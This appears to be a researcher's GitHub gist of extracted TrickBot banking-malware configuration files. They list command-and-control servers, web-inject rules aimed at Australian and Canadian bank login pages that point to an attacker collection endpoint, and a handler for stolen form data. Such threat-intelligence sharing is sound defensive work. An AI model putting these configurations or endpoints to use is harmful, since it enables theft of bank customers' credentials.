Skip to content

Instantly share code, notes, and snippets.

@hasherezade

hasherezade/ mcconf3.xml

Last active October 28, 2016 20:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hasherezade/0c464f970018f509444243b67a0c5447 to your computer and use it in GitHub Desktop.
Save hasherezade/0c464f970018f509444243b67a0c5447 to your computer and use it in GitHub Desktop.
Download ZIP
TrickBot configuration
Raw
mcconf3.xml
<mcconf>
<ver>1000004</ver>
<gtag>tt0002</gtag>
<servs>
<srv>91.219.28.77:443</srv>
<srv>193.9.28.24:443</srv>
<srv>37.1.209.51:443</srv>
<srv>138.201.44.28:443</srv>
<srv>188.116.23.98:443</srv>
<srv>104.250.138.194:443</srv>
<srv>46.22.211.34:443</srv>
<srv>68.179.234.69:443</srv>
<srv>5.12.28.0:443</srv>
<srv>36.37.176.6:443</srv>
<srv>37.109.52.75:443</srv>
<srv>213.174.21.162:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo"/>
<module name="injectDll"/>
</autorun>
Raw
dinj.xml
<igroup>
<dinj>
<lm>*/onlineserv/CM*</lm>
<hl>91.219.28.103/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*ibanking.stgeorge.com.au/ibank/loginPage.action*</lm>
<hl>91.219.28.103/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*ib.nab.com.au/nabib/index.jsp*</lm>
<hl>91.219.28.103/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*banking.westpac.com.au/wbc/banking/handler*</lm>
<hl>91.219.28.103/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*anz.com/IBAU/BANKAWAYTRAN*</lm>
<hl>91.219.28.103/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
<dinj>
<lm>*anz.com/INETBANK/login.asp*</lm>
<hl>91.219.28.103/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*cibconline.cibc.com/olbtxn/authentication/*.cibc*</lm>
<hl>91.219.28.103/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
</igroup>
Raw
dpost.xml
<dpost>
<handler>http://188.138.1.53:8082</handler>
</dpost>
Raw
injectdll.xml
<moduleconfig>
<autostart>yes</autostart>
<needinfo name="id"/>
<needinfo name="ip"/>
<autoconf>
<conf ctl="dinj" file="dinj" period="90"/>
<conf ctl="sinj" file="sinj" period="90"/>
<conf ctl="dpost" file="dpost" period="180"/>
</autoconf>
</moduleconfig>
Raw
mcconf.xml
<mcconf>
<ver>1000002</ver>
<gtag>tmt2</gtag>
<servs>
<srv>91.219.28.77:443</srv>
<srv>193.9.28.24:443</srv>
<srv>37.1.209.51:443</srv>
<srv>138.201.44.28:443</srv>
<srv>188.116.23.98:443</srv>
<srv>104.250.138.194:443</srv>
<srv>46.22.211.34:443</srv>
<srv>68.179.234.69:443</srv>
<srv>5.12.28.0:443</srv>
<srv>36.37.176.6:443</srv>
<srv>37.109.52.75:443</srv>
<srv>27.208.131.97:443</srv>
</servs>
<autorun>
<modulename="systeminfo" ctl="GetSystemInfo"/>
<modulename="injectDll"/>
</autorun>
</mcconf>
Raw
mcconf2.xml
<mcconf>
<ver>1000003</ver>
<gtag>tt0002</gtag>
<servs>
<srv>91.219.28.77:443</srv>
<srv>193.9.28.24:443</srv>
<srv>37.1.209.51:443</srv>
<srv>138.201.44.28:443</srv>
<srv>188.116.23.98:443</srv>
<srv>104.250.138.194:443</srv>
<srv>46.22.211.34:443</srv>
<srv>68.179.234.69:443</srv>
<srv>5.12.28.0:443</srv>
<srv>36.37.176.6:443</srv>
<srv>37.109.52.75:443</srv>
<srv>84.232.251.0:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo"/>
<module name="injectDll"/>
</autorun>
</mcconf>
Raw
servconf.xml
<servconf>
<expir>1480550400</expir>
<plugins>
<psrv>80.79.114.179:443</psrv>
</plugins>
</servconf>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment